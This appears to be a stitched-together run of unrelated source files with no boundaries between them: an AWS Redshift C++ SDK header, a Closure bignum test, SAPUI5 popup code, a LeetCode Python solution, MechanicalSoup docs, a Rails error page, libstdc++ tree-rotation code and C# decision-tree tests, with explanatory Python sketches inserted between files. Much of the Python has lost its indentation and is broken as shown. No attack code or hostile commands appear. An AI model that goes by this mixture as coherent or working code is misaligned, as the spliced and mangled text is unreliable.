/**
* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0.
*/
#pragma once
#include <aws/redshift/Redshift_EXPORTS.h>
#include <aws/core/utils/memory/stl/AWSString.h>
#include <aws/core/utils/memory/stl/AWSVector.h>
#include <aws/redshift/model/ResponseMetadata.h>
#include <aws/redshift/model/ReservedNodeOffering.h>
#include <utility>
namespace Aws
{
template<typename RESULT_TYPE>
class AmazonWebServiceResult;
namespace Utils
{
namespace Xml
{
class XmlDocument;
} // namespace Xml
} // namespace Utils
namespace Redshift
{
namespace Model
{
/**
* <p/><p><h3>See Also:</h3> <a
* href="http://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/ReservedNodeOfferingsMessage">AWS
* API Reference</a></p>
*/
class AWS_REDSHIFT_API DescribeReservedNodeOfferingsResult
{
public:
DescribeReservedNodeOfferingsResult();
DescribeReservedNodeOfferingsResult(const Aws::AmazonWebServiceResult<Aws::Utils::Xml::XmlDocument>& result);
DescribeReservedNodeOfferingsResult& operator=(const Aws::AmazonWebServiceResult<Aws::Utils::Xml::XmlDocument>& result);
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline const Aws::String& GetMarker() const{ return m_marker; }
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline void SetMarker(const Aws::String& value) { m_marker = value; }
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline void SetMarker(Aws::String&& value) { m_marker = std::move(value); }
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline void SetMarker(const char* value) { m_marker.assign(value); }
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline DescribeReservedNodeOfferingsResult& WithMarker(const Aws::String& value) { SetMarker(value); return *this;}
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline DescribeReservedNodeOfferingsResult& WithMarker(Aws::String&& value) { SetMarker(std::move(value)); return *this;}
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline DescribeReservedNodeOfferingsResult& WithMarker(const char* value) { SetMarker(value); return *this;}
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline const Aws::Vector<ReservedNodeOffering>& GetReservedNodeOfferings() const{ return m_reservedNodeOfferings; }
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline void SetReservedNodeOfferings(const Aws::Vector<ReservedNodeOffering>& value) { m_reservedNodeOfferings = value; }
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline void SetReservedNodeOfferings(Aws::Vector<ReservedNodeOffering>&& value) { m_reservedNodeOfferings = std::move(value); }
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline DescribeReservedNodeOfferingsResult& WithReservedNodeOfferings(const Aws::Vector<ReservedNodeOffering>& value) { SetReservedNodeOfferings(value); return *this;}
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline DescribeReservedNodeOfferingsResult& WithReservedNodeOfferings(Aws::Vector<ReservedNodeOffering>&& value) { SetReservedNodeOfferings(std::move(value)); return *this;}
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline DescribeReservedNodeOfferingsResult& AddReservedNodeOfferings(const ReservedNodeOffering& value) { m_reservedNodeOfferings.push_back(value); return *this; }
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline DescribeReservedNodeOfferingsResult& AddReservedNodeOfferings(ReservedNodeOffering&& value) { m_reservedNodeOfferings.push_back(std::move(value)); return *this; }
inline const ResponseMetadata& GetResponseMetadata() const{ return m_responseMetadata; }
inline void SetResponseMetadata(const ResponseMetadata& value) { m_responseMetadata = value; }
inline void SetResponseMetadata(ResponseMetadata&& value) { m_responseMetadata = std::move(value); }
inline DescribeReservedNodeOfferingsResult& WithResponseMetadata(const ResponseMetadata& value) { SetResponseMetadata(value); return *this;}
inline DescribeReservedNodeOfferingsResult& WithResponseMetadata(ResponseMetadata&& value) { SetResponseMetadata(std::move(value)); return *this;}
private:
Aws::String m_marker;
Aws::Vector<ReservedNodeOffering> m_reservedNodeOfferings;
ResponseMetadata m_responseMetadata;
};
} // namespace Model
} // namespace Redshift
} // namespace Aws
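The Marker documented above is the pagination token for DescribeReservedNodeOfferings: keep re-issuing the call with the returned Marker until it comes back empty. A minimal sketch of that loop, written here in Python with boto3 rather than the C++ SDK shown above (client construction and credentials are assumed); the C++ result type exposes the same data through GetMarker() and GetReservedNodeOfferings():

    import boto3

    client = boto3.client("redshift")
    offerings = []
    marker = None
    while True:
        kwargs = {"Marker": marker} if marker else {}
        response = client.describe_reserved_node_offerings(**kwargs)
        offerings.extend(response.get("ReservedNodeOfferings", []))
        marker = response.get("Marker")
        if not marker:  # an empty Marker means all records have been retrieved
            break
    print(len(offerings), "reserved node offerings")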
<!-- Copyright 2014 Google Inc. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// -->
<!DOCTYPE html>
<title>Unit Test of e2e.FastModulus</title>
<script src="../../../../../javascript/closure/base.js"></script>
<script src="test_js_deps-runfiles.js"></script>
<script>
goog.require('goog.testing.jsunit');
goog.require('e2e.BigNum');
goog.require('e2e.bigNumTestData');
goog.require('e2e.BigPrimeNum');
goog.require('e2e.FastModulus');
</script>
<script>
var P256 = new e2e.BigNum(e2e.bigNumTestData.P_256);
var P512 = P256.multiply(P256);
//
// Note that additional tests have moved to ecc/fastmodulus_test.html
//
/**
* Ensure that FastModulus.FFFFFF works on all bignums whose high
* 24 bits are 1, no matter what the alignment.
*/
function testModulusFFFFFF() {
var value = new e2e.BigPrimeNum(e2e.bigNumTestData.N);
for (var i = 0; i < 24; i++) {
var modulus = value.shiftLeft(i);
var value1 = new e2e.FastModulus.FFFFFF(modulus).residue(P512);
var value2 = P512.mod(modulus);
assertTrue(value1.isEqual(value2));
}
}
/**
* Ensure that FastModulus.Ox1000000
* works on all bignums whose high
* 24 bits are 1, no matter what the alignment.
*/
function testModulus1000000() {
var value = new e2e.BigPrimeNum([1, 0, 0, 0, 0x88, 0x88, 0x89]);
for (var i = 0; i < 24; i++) {
var modulus = value.shiftLeft(i);
var value1 = new e2e.FastModulus.Ox1000000(modulus).residue(P512);
var value2 = P512.mod(modulus);
assertTrue(value1.isEqual(value2));
}
}
</script>
#!/usr/bin/env node
require('@storybook/cli/bin/index');
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
        # Dummy head so removing the first node needs no special case.
        h = ListNode(-1)
        h.next = head
        # Two pointers with a gap of n + 1: when q runs off the end of the
        # list, p points to the node just before the one to remove.
        p, q = h, h
        for _ in range(n + 1):
            assert q
            q = q.next
        while q is not None:
            p = p.next
            q = q.next
        p.next = p.next.next
        return h.next
def createList():
head = ListNode(0)
cur = head
for i in range(1, 10):
cur.next = ListNode(i)
cur = cur.next
return head
def printList(head):
cur = head
    while cur is not None:
print(cur.val, '-->', end='')
cur = cur.next
print('NULL')
if __name__ == "__main__":
head = createList()
printList(head)
res = Solution().removeNthFromEnd(head, 2)
    printList(res)
.. MechanicalSoup documentation master file, created by
sphinx-quickstart on Sun Sep 14 18:44:39 2014.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
.. image:: ../assets/mechanical-soup-logo.png
:alt: MechanicalSoup. A Python library for automating website
interaction.
:align: center
.. This '|' generates a blank line to avoid sticking the logo to the
section.
|
Welcome to MechanicalSoup's documentation!
==========================================
A Python library for automating interaction with websites. MechanicalSoup automatically stores and sends cookies, follows redirects, and can follow links and submit forms. It doesn't do JavaScript.
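A minimal usage sketch (the URL, form selector, and field names below are
hypothetical and only illustrate the API)::

    import mechanicalsoup

    browser = mechanicalsoup.StatefulBrowser()
    browser.open("https://example.com/login")
    browser.select_form('form[action="/login"]')  # pick the login form
    browser["username"] = "alice"                 # fill its fields by name
    browser["password"] = "secret"
    response = browser.submit_selected()          # cookies persist for later requests
    print(response.url)
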
MechanicalSoup was created by `M Hickford
<https://github.com/hickford/>`__, who was a fond user of the
`Mechanize <https://github.com/jjlee/mechanize>`__ library.
Unfortunately, Mechanize is `incompatible with Python 3
<https://github.com/jjlee/mechanize/issues/96>`__ and its development
stalled for several years. MechanicalSoup provides a similar API, built on Python
giants `Requests <http://docs.python-requests.org/en/latest/>`__ (for
http sessions) and `BeautifulSoup
<http://www.crummy.com/software/BeautifulSoup/>`__ (for document
navigation). Since 2017 it is a project actively maintained by a small
team including `@hemberger <https://github.com/hemberger>`__ and `@moy
<https://github.com/moy/>`__.
Contents:
.. toctree::
:maxdepth: 2
introduction
tutorial
mechanicalsoup
faq
external-resources
ChangeLog
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
/*!
* SAP UI development toolkit for HTML5 (SAPUI5/OpenUI5)
* (c) Copyright 2009-2015 SAP SE or an SAP affiliate company.
* Licensed under the Apache License, Version 2.0 - see LICENSE.txt.
*/
// Provides class sap.ui.core.PopupSupport
sap.ui.define([ 'jquery.sap.global', './Element', './Control' ], function(jQuery, Element, Control) {
"use strict";
/**
* This class provides some methods for Popup handling. This class can be
* used as a mixin for controls that use a Popup as a local instance.
*
* @returns {sap.ui.core.PopupSupport}
* @constructor
* @private
* @alias sap.ui.core.PopupSupport
*/
var PopupSupport = function() {
this.getMetadata().addPublicMethods([ "getParentPopup", "isInPopup", "getParentPopupId", "addToPopup", "removeFromPopup" ]);
/**
* Checks if the (optional) given jQuery-object or DOM-node is within a
* Popup. If no object is given the instance of the control will be used
* to check.
*
* @param {jQuery |
* Node} [oThis] is the object that should be checked
* (optional)
* @returns {boolean} whether this control instance is part of a Popup
*/
this.isInPopup = function(oThis) {
var $ParentPopup = this.getParentPopup(oThis);
return $ParentPopup && $ParentPopup.length > 0;
};
/**
* This function returns the parent Popup if available.
*
* @param {control}
* [oThat] is an optional control instance. If another
* instance than "this" is given the corresponding control
* instance will be used to fetch the Popup.
* @returns {jQuery} [ParentPopup]
*/
this.getParentPopup = function(oThat) {
// use either given object (control or DOM-ref) or this instance
var oThis = oThat ? oThat : this;
// if oThis is an element use its DOM-ref to look for a Popup. Else
// 'oThis' is a DOM-ref, therefore simply use it
var $This = jQuery(oThis instanceof sap.ui.core.Element ? oThis.getDomRef() : oThis);
// look up if there is a Popup above used DOM-ref
return $This.closest("[data-sap-ui-popup]");
};
/**
* This returns the corresponding unique ID of the parent Popup.
*
* @param {control}
* [oThat] is an optional control instance. If another
* instance than "this" is given the corresponding control
* instance will be used to fetch the Popup.
* @returns [string] ParentPopupId
*/
this.getParentPopupId = function(oThis) {
var $ParentPopup = this.getParentPopup(oThis);
return $ParentPopup.attr("data-sap-ui-popup");
};
/**
* Adds the given child Popup id to the given parent's association.
*
* @param [string]
* sParentPopupId to which the id will be added
* @param [string]
* sChildPopupId that will be added to the parent Popup
*/
this.addChildToPopup = function(sParentPopupId, sChildPopupId) {
var sEventId = "sap.ui.core.Popup.addFocusableContent-" + sParentPopupId;
sap.ui.getCore().getEventBus().publish("sap.ui", sEventId, {
id : sChildPopupId
});
};
/**
* Removes the control id from the Popup. If a dedicated Popup id is given
* then the control will be removed accordingly from this Popup. Else
* the closest Popup will be used.
*
* @param {string}
* [sPopupId] from which Popup the control should be removed
* (optional)
*/
this.removeChildFromPopup = function(sPopupId) {
if (!sPopupId) {
sPopupId = this.getPopupId();
}
// de-register the id of the Menu-Popup from the parent Popup's focusable content
var sEventId = "sap.ui.core.Popup.removeFocusableContent-" + sPopupId;
sap.ui.getCore().getEventBus().publish("sap.ui", sEventId, {
id : this.getId()
});
};
/**
* Closes a specific Popup when the control instance isn't available
*
* @param [string]
* sPopupId of Popup that should be closed
*/
this.closePopup = function(sPopupId) {
var sEventId = "sap.ui.core.Popup.closePopup-" + sPopupId;
sap.ui.getCore().getEventBus().publish("sap.ui", sEventId);
};
/**
* This function calls a popup to increase its z-index
*
* @param [string]
* sPopupId of Popup that should increase its z-index
* @param [boolean]
* bIsParent marks if a parent Popup calls its child Popups
* to increase their z-index
*/
this.increaseZIndex = function(sPopupId, bIsParent) {
var sEventId = "sap.ui.core.Popup.increaseZIndex-" + sPopupId;
sap.ui.getCore().getEventBus().publish("sap.ui", sEventId, {
isFromParentPopup : bIsParent ? bIsParent : false
});
};
/**
* This function helps Popup controls to enable tab chaining within their
* content. For the commons.Dialog and ux3.ToolPopup there is a fake
* element at the beginning and at the end of the DOM-structure. These
* elements are used to enable the chaining. If these elements are focused,
* this function determines which element in the content or footer area
* has to be focused. Since those controls have a content and footer area
* with buttons, it has to be checked whether a button or content element
* is available that can be focused.
*
* @param [object]
* mParameters contain all necessary parameters
* @param [object.object]
* mParameter.that is the control that calls this function.
* Needed for debug logging info
* @param [object.object]
* mParameters.event is the event that is being forwarded
* from the
* @param [object.string]
* mParameters.firstFocusable is the first focusable element
* in the control
* @param [object.string]
* mParameters.lastFocusable is the last focusable element in
* the control
* @param [object.jQuery]
* mParameters.$FocusablesContent are focusable elements in
* the content area of the control
* @param [object.jQuery]
* mParameters.$FocusablesFooter are focusable elements in
* the footer area of the control (e.g. buttons)
*/
this.focusTabChain = function(mParameters) {
var oSourceDomRef = mParameters.event.target,
sName = mParameters.that.getMetadata().getName(),
oFocusDomRef;
if ((!!!mParameters.$FocusablesContent || !!!mParameters.$FocusablesFooter) ||
(!mParameters.$FocusablesContent.length && !mParameters.$FocusablesFooter.length)) {
// if there is neither content nor footer content (yet) simply do nothing
return;
}
/*
* It's not needed to check if buttons are set since
* jQuery(":focusable", jQuery.sap.byId(this.getId() + "-fhfe")) or
* jQuery(":sapFocusable", jQuery.sap.byId(this.getId() + "-fhfe"))
* returns an empty array. Therefore these elements won't be found
* via 'lastFocusableDomRef()'
*/
if (oSourceDomRef.id === mParameters.firstFocusable) {
// the FocusHandlingFirstElement was focused and thus the focus
// should move to the last element.
jQuery.sap.log.debug("First dummy focus element was focused", "", sName);
if (mParameters.$FocusablesFooter.length > 0) {
jQuery.sap.log.debug("Last footer element will be focused", "", sName);
oFocusDomRef = mParameters.$FocusablesFooter[mParameters.$FocusablesFooter.length - 1];
} else {
jQuery.sap.log.debug("Last content element will be focused", "", sName);
oFocusDomRef = mParameters.$FocusablesContent[mParameters.$FocusablesContent.length - 1];
}
} else if (oSourceDomRef.id === mParameters.lastFocusable) {
// the FocusHandlingEndElement was focused and thus the focus
// should move to the first element.
jQuery.sap.log.debug("Last dummy focus element was focues", "", sName);
if (mParameters.$FocusablesContent.length > 0) {
jQuery.sap.log.debug("First content element will be focused", "", sName);
oFocusDomRef = mParameters.$FocusablesContent[0];
} else {
jQuery.sap.log.debug("First footer element will be focused", "", sName);
oFocusDomRef = mParameters.$FocusablesFooter[0];
}
}
if (oFocusDomRef) {
/*
* This check is needed especially for IE9 because when IE9 is
* used together with JAWS, the element that will be focused
* isn't read when the focus happens too fast. Therefore a delay
* is added so that JAWS can read the newly focused element.
*/
var iDelay = sap.ui.Device.browser.msie && sap.ui.Device.browser.version === 9 ? 100 : 0;
jQuery.sap.delayedCall(iDelay, this, function() {
// if the element is a control the focus should be called
// via the control
// especially if the control has an individual focus DOM-ref
var oControl = sap.ui.getCore().byId(oFocusDomRef.id);
if (oControl instanceof Control) {
jQuery.sap.log.debug("Focus will be handled by " + oControl.getMetadata().getName(), "", sName);
} else {
jQuery.sap.log.debug("oFocusDomRef will be focused", "", sName);
}
jQuery.sap.focus(oControl ? oControl : oFocusDomRef);
return oControl ? oControl.getId() : oFocusDomRef.id;
});
}
};
};
return PopupSupport;
}, /* bExport= */true);
<!DOCTYPE html>
<html>
<head>
<title>The change you wanted was rejected (422)</title>
<style type="text/css">
body { background-color: #fff; color: #666; text-align: center; font-family: arial, sans-serif; }
div.dialog {
width: 25em;
padding: 0 4em;
margin: 4em auto 0 auto;
border: 1px solid #ccc;
border-right-color: #999;
border-bottom-color: #999;
}
h1 { font-size: 100%; color: #f00; line-height: 1.5em; }
</style>
</head>
<body>
<!-- This file lives in public/422.html -->
<div class="dialog">
<h1>The change you wanted was rejected.</h1>
<p>Maybe you tried to change something you didn't have access to.</p>
</div>
</body>
</html>
{
"API_URL": "https://pwa-workshop-api.herokuapp.com",
"VAPID_PUBLIC_KEY": "BM88mSlUg4mvjcPK5QrzRfQzow91F47iEazCnoTBQ8Hv_AVrJviLcnrNumTK319qWOt43sgOzBJs6UrdOW5IxHg"
}
// -*- C++ -*-
// Copyright (C) 2005, 2006 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the terms
// of the GNU General Public License as published by the Free Software
// Foundation; either version 2, or (at your option) any later
// version.
// This library is distributed in the hope that it will be useful, but
// WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this library; see the file COPYING. If not, write to
// the Free Software Foundation, 59 Temple Place - Suite 330, Boston,
// MA 02111-1307, USA.
// As a special exception, you may use this file as part of a free
// software library without restriction. Specifically, if other files
// instantiate templates or use macros or inline functions from this
// file, or you compile this file and link it with other files to
// produce an executable, this file does not by itself cause the
// resulting executable to be covered by the GNU General Public
// License. This exception does not however invalidate any other
// reasons why the executable file might be covered by the GNU General
// Public License.
// Copyright (C) 2004 Ami Tavory and Vladimir Dreizin, IBM-HRL.
// Permission to use, copy, modify, sell, and distribute this software
// is hereby granted without fee, provided that the above copyright
// notice appears in all copies, and that both that copyright notice
// and this permission notice appear in supporting documentation. None
// of the above authors, nor IBM Haifa Research Laboratories, make any
// representation about the suitability of this software for any
// purpose. It is provided "as is" without express or implied
// warranty.
/**
* @file rotate_fn_imps.hpp
* Contains imps for rotating nodes.
*/
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
rotate_left(node_pointer p_x)
{
node_pointer p_y = p_x->m_p_right;
p_x->m_p_right = p_y->m_p_left;
if (p_y->m_p_left != NULL)
p_y->m_p_left->m_p_parent = p_x;
p_y->m_p_parent = p_x->m_p_parent;
if (p_x == m_p_head->m_p_parent)
m_p_head->m_p_parent = p_y;
else if (p_x == p_x->m_p_parent->m_p_left)
p_x->m_p_parent->m_p_left = p_y;
else
p_x->m_p_parent->m_p_right = p_y;
p_y->m_p_left = p_x;
p_x->m_p_parent = p_y;
_GLIBCXX_DEBUG_ONLY(assert_node_consistent(p_x);)
_GLIBCXX_DEBUG_ONLY(assert_node_consistent(p_y);)
apply_update(p_x, (node_update* )this);
apply_update(p_x->m_p_parent, (node_update* )this);
}
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
rotate_right(node_pointer p_x)
{
node_pointer p_y = p_x->m_p_left;
p_x->m_p_left = p_y->m_p_right;
if (p_y->m_p_right != NULL)
p_y->m_p_right->m_p_parent = p_x;
p_y->m_p_parent = p_x->m_p_parent;
if (p_x == m_p_head->m_p_parent)
m_p_head->m_p_parent = p_y;
else if (p_x == p_x->m_p_parent->m_p_right)
p_x->m_p_parent->m_p_right = p_y;
else
p_x->m_p_parent->m_p_left = p_y;
p_y->m_p_right = p_x;
p_x->m_p_parent = p_y;
_GLIBCXX_DEBUG_ONLY(assert_node_consistent(p_x);)
_GLIBCXX_DEBUG_ONLY(assert_node_consistent(p_y);)
apply_update(p_x, (node_update* )this);
apply_update(p_x->m_p_parent, (node_update* )this);
}
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
rotate_parent(node_pointer p_nd)
{
node_pointer p_parent = p_nd->m_p_parent;
if (p_nd == p_parent->m_p_left)
rotate_right(p_parent);
else
rotate_left(p_parent);
_GLIBCXX_DEBUG_ASSERT(p_parent->m_p_parent == p_nd);
_GLIBCXX_DEBUG_ASSERT(p_nd->m_p_left == p_parent ||
p_nd->m_p_right == p_parent);
}
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
apply_update(node_pointer /*p_nd*/, null_node_update_pointer /*p_update*/)
{ }
PB_DS_CLASS_T_DEC
template<typename Node_Update_>
inline void
PB_DS_CLASS_C_DEC::
apply_update(node_pointer p_nd, Node_Update_* /*p_update*/)
{
node_update::operator()(
node_iterator(p_nd),
const_node_iterator(static_cast<node_pointer>(NULL)));
}
PB_DS_CLASS_T_DEC
template<typename Node_Update_>
inline void
PB_DS_CLASS_C_DEC::
update_to_top(node_pointer p_nd, Node_Update_* p_update)
{
while (p_nd != m_p_head)
{
apply_update(p_nd, p_update);
p_nd = p_nd->m_p_parent;
}
}
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
update_to_top(node_pointer /*p_nd*/, null_node_update_pointer /*p_update*/)
{ }
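For readers less used to this pointer surgery, the left rotation above can be summarized with a plain node class in Python (a purely illustrative sketch: the field names are not the pb_ds member names, and the header-sentinel handling is omitted). rotate_right is the mirror image:

    class Node:
        def __init__(self, key):
            self.key = key
            self.left = self.right = self.parent = None

    def rotate_left(x):
        y = x.right
        x.right = y.left              # y's left subtree moves under x
        if y.left is not None:
            y.left.parent = x
        y.parent = x.parent           # y takes x's place under x's parent
        if x.parent is not None:
            if x is x.parent.left:
                x.parent.left = y
            else:
                x.parent.right = y
        y.left = x                    # x hangs under y as its left child
        x.parent = y
        return y                      # new root of the rotated subtree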
using System.Diagnostics;
using System.Linq;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using SharpLearning.Containers.Matrices;
using SharpLearning.DecisionTrees.Learners;
using SharpLearning.Metrics.Classification;
namespace SharpLearning.DecisionTrees.Test.Learners
{
[TestClass]
public class ClassificationDecisionTreeLearnerTest
{
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Reuse_No_Valid_Split()
{
var (observations, targets) = DataSetUtilities.LoadGlassDataSet();
var sut = new ClassificationDecisionTreeLearner();
// train initial model.
sut.Learn(observations, targets);
// reuse learner, with smaller data that provides no valid split.
var onlyUniqueTargetValue = 1.0;
var onlyOneUniqueObservations = (F64Matrix)observations.Rows(0, 1, 2, 3, 4);
var onlyOneUniquetargets = Enumerable.Range(0, onlyOneUniqueObservations.RowCount).Select(v => onlyUniqueTargetValue).ToArray();
var model = sut.Learn(onlyOneUniqueObservations, onlyOneUniquetargets);
var predictions = model.Predict(onlyOneUniqueObservations);
// no valid split, so should result in the model always returning the onlyUniqueTargetValue.
for (int i = 0; i < predictions.Length; i++)
{
Assert.AreEqual(onlyUniqueTargetValue, predictions[i], 0.0001);
}
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_Depth_100()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude(100);
Assert.AreEqual(0.038461538461538464, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude(1);
Assert.AreEqual(0.23076923076923078, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_5()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude(5);
Assert.AreEqual(0.076923076923076927, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_100()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass(100);
Assert.AreEqual(0.0, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass(1);
Assert.AreEqual(0.5280373831775701, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_5()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass(5);
Assert.AreEqual(0.16355140186915887, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_Depth_100_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(100, 1);
Assert.AreEqual(0.038461538461538464, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_1_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(1, 1);
Assert.AreEqual(0.23076923076923078, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_5_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(5, 1);
Assert.AreEqual(0.076923076923076927, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_100_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(100, 1);
Assert.AreEqual(0.0, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_1_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(1, 1);
Assert.AreEqual(0.5280373831775701, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_5_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(5, 1);
Assert.AreEqual(0.16355140186915887, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_Depth_100_Weight_10()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(100, 10);
Assert.AreEqual(0.076923076923076927, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_5_Weight_10()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(5, 10);
Assert.AreEqual(0.076923076923076927, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_100_Weight_10()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(100, 10);
Assert.AreEqual(0.070093457943925228, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_5_Weight_10()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(5, 10);
Assert.AreEqual(0.14018691588785046, error, 0.0000001);
}
double ClassificationDecisionTreeLearner_Learn_Glass(int treeDepth)
{
var (observations, targets) = DataSetUtilities.LoadGlassDataSet();
var sut = new ClassificationDecisionTreeLearner(treeDepth, 1, observations.ColumnCount, 0.001, 42);
var model = sut.Learn(observations, targets);
var predictions = model.Predict(observations);
var evaluator = new TotalErrorClassificationMetric<double>();
var error = evaluator.Error(targets, predictions);
return error;
}
double ClassificationDecisionTreeLearner_Learn_Aptitude(int treeDepth)
{
var (observations, targets) = DataSetUtilities.LoadAptitudeDataSet();
var sut = new ClassificationDecisionTreeLearner(treeDepth, 1, 2, 0.001, 42);
var model = sut.Learn(observations, targets);
var predictions = model.Predict(observations);
var evaluator = new TotalErrorClassificationMetric<double>();
var error = evaluator.Error(targets, predictions);
return error;
}
double ClassificationDecisionTreeLearner_Learn_Glass_Weighted(int treeDepth, double weight)
{
var (observations, targets) = DataSetUtilities.LoadGlassDataSet();
var weights = targets.Select(v => Weight(v, 1, weight)).ToArray();
var sut = new ClassificationDecisionTreeLearner(treeDepth, 1, observations.ColumnCount, 0.001, 42);
var model = sut.Learn(observations, targets, weights);
var predictions = model.Predict(observations);
var evaluator = new TotalErrorClassificationMetric<double>();
Trace.WriteLine(evaluator.ErrorString(targets, predictions));
var error = evaluator.Error(targets, predictions);
return error;
}
double ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(int treeDepth, double weight)
{
var (observations, targets) = DataSetUtilities.LoadAptitudeDataSet();
var weights = targets.Select(v => Weight(v, 0, weight)).ToArray();
var sut = new ClassificationDecisionTreeLearner(treeDepth, 1, 2, 0.001, 42);
var model = sut.Learn(observations, targets, weights);
var predictions = model.Predict(observations);
var evaluator = new TotalErrorClassificationMetric<double>();
Trace.WriteLine(evaluator.ErrorString(targets, predictions));
var error = evaluator.Error(targets, predictions);
return error;
}
public double Weight(double v, double targetToWeigh, double weight)
{
if (v == targetToWeigh)
return weight;
return 1.0;
}
}
}
